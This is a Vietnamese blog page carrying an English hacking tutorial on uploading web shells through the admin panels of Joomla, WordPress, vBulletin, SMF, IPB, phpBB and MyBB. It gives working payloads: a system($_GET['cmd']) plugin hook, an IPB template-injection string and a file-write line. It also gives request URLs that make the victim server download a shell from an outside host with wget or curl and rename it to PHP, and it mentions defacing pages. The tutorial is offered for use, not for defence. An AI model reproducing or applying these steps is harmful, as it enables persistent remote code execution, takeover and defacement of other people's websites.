• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Hacking and Security » Local Attack » TUTORIALS » [TUT] - Up shell - Joomla, WP, vBB...

[TUT] - Up shell - Joomla, WP, vBB...

Unknown Labels: Hacking and Security, Local Attack, TUTORIALS Leave A Comment 00:16
1.Joomla  Site:
After Login into admin panel u will find Extensions on 5th No. expand this
click on it > Template Manager > check on any template (like beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...... Done Highslide JS
site.com/templates/template name/index.php
like site.com/templates/hjp/index.php

2.Wordpress:
Login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in site.com/wp-content/themes/theme name u edit/404.php

3.Vbulletin:
1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows:
Product: vBulletin

Hook Location: global_start

Title: (Anything …)

Execution Order: 5

Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean(); Plugin is Active : Yes

So in the end it should look like this:



4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit Templates.
6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME.
7-Search

Code:
$header

Somewhere near the top. Replace it with:

Code:
$header
$execcod

e

8-Now go to the forum and add after the index.php

Code:
?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php

So it looks like

Code:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php

What this does is shell.txt downloads, and renames shell.php

Now,
the shell must be located in the directory shell.php forums … If not,
then wget is disabled on that server, you can try alternative methods:
Code:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.evilshell.com/shell.txt > shell.php

Code:
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.evilshell.com/shell.txt shell.php

4.SMF:
Login into adminpanel
u need to download any smf theme in zip format and put ur shell.php in it and save
admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php Highslide JS
after upload shell will find > site.com/Themes/theme name/shell.php

5.IPB: ( Cái này chưa gặp bao h` Highslide JS)
Login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help
edit:
help.txt

Choose topic from list, or search for a topic
In right box add this code:

${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}

When you add it, specify go on bottom
Now we go on:

http://www.site.com/index...?app=core&module=help

And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php

6.phpBB:
login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html
At down of:

  PHP Code:
  [LEFT]                         [/LEFT]

We add:

[PHP]
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
And save it.
Now  go on:
http://www.site.com/forum...q.php?o=....com/shell.txt

Shell  find in site path/shell.php

7.Mybb forum:
Login admincp > Go to Templates and Styles, find default MyBB Theme is.
Then go to Templates,
expand templates that are used by the current theme.
Find Calendar templates,
click it. Click 'calender'. Above all the html code, paste this:
http://pastebin.com/eV1WngfM
save Highslide JS
shell will b find in site.com/calendar.php
note: if u got error like "code is danger unable to edit "
then simply paste ur deface code to deface calendar.php

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • [Warning] Freecode.vn
    Exploit: SQL Injection Đánh giá: Nghiêm trọng. Khai thác: Query lấy thông tin User. Tình trạng: (Đang liên hệ Quản trị viên) .
  • 10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 1)
    Ngay từ những ngày đầu tiên khi những chiếc máy tính ra đời từ cách đây hơn 50 năm, một loại tội phạm mới cũng theo đó mà xuất hiện: tội p...
  • [Blog] Bán Blog 118k View - Quang Thái IT
    - Cần Bán Blog 118k View Template đẹp giá cả thương lượng! - URL:  QuangThaiIT.BlogSpot.COM - Nhấn Liên Hệ để Trao đổi thông tin nhé! Cảm ơn...
  • .htaccess security
    Để vào các foder file .htacces phòng tránh up shell: <Files ~ “^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml) ”>...
  • TRAO ĐỔI TEXTLINK CHO BLOG
    LINK LIÊN KẾT ( Copy link   này vào trang  Home  của website bạn ) <a href=' https://letientruong.blogspot.com/ ' title=' Lê...
  • Share CMND Người Dân Tộc
    Demo :  http://link4ad.net/ssTSc3wk Download :  http://link4ad.net/NecR8DBe Độc quyền share tại  Minh Haku IT
  • Vbulletin Hacker Shell
    Code: <?php /* |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.| |.|###################################################|.| |.|# ...
  • share anh bìa chúng ta khong thuộc về nhau
    CLICK DOWNLOAD
  • 3 cách phòng chống DDoS hữu hiệu!
    Tấn công DDOS hay còn được gọi tấn công từ chối dịch vụ đơn giản được hiểu là tạo ra 1 lượt truy cập ảo ồ ạt vào một địa chỉ website tại cùn...
  • KẾT NỐI BLOGGER - Zoy Thủ Thuật #Zoy
    Nhằm mục đích trao đổi kiến thức và kết nối cộng đồng các website, blog.  Đức Blog   xin được liên kết text link với các blog website, forum...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • [Warning] Freecode.vn
    [Warning] Freecode.vn
    Exploit: SQL Injection Đánh giá: Nghiêm trọng. Khai thác: Query lấy thông tin User. Tình trạng: (Đang liên hệ Quản trị viên) .
  • 10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 1)
    Ngay từ những ngày đầu tiên khi những chiếc máy tính ra đời từ cách đây hơn 50 năm, một loại tội phạm mới cũng theo đó mà xuất hiện: tội p...
  • [Blog] Bán Blog 118k View - Quang Thái IT
    [Blog] Bán Blog 118k View - Quang Thái IT
    - Cần Bán Blog 118k View Template đẹp giá cả thương lượng! - URL:  QuangThaiIT.BlogSpot.COM - Nhấn Liên Hệ để Trao đổi thông tin nhé! Cảm ơn...
  • .htaccess security
    Để vào các foder file .htacces phòng tránh up shell: <Files ~ “^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml) ”>...
  • TRAO ĐỔI TEXTLINK CHO BLOG
    TRAO ĐỔI TEXTLINK CHO BLOG
    LINK LIÊN KẾT ( Copy link   này vào trang  Home  của website bạn ) <a href=' https://letientruong.blogspot.com/ ' title=' Lê...
  • Share CMND Người Dân Tộc
    Share CMND Người Dân Tộc
    Demo :  http://link4ad.net/ssTSc3wk Download :  http://link4ad.net/NecR8DBe Độc quyền share tại  Minh Haku IT
  • Vbulletin Hacker Shell
    Code: <?php /* |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.| |.|###################################################|.| |.|# ...
  • share anh bìa chúng ta khong thuộc về nhau
    share anh bìa chúng ta khong thuộc về nhau
    CLICK DOWNLOAD
  • 3 cách phòng chống DDoS hữu hiệu!
    Tấn công DDOS hay còn được gọi tấn công từ chối dịch vụ đơn giản được hiểu là tạo ra 1 lượt truy cập ảo ồ ạt vào một địa chỉ website tại cùn...
  • KẾT NỐI BLOGGER - Zoy Thủ Thuật #Zoy
    KẾT NỐI BLOGGER - Zoy Thủ Thuật #Zoy
    Nhằm mục đích trao đổi kiến thức và kết nối cộng đồng các website, blog.  Đức Blog   xin được liên kết text link với các blog website, forum...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt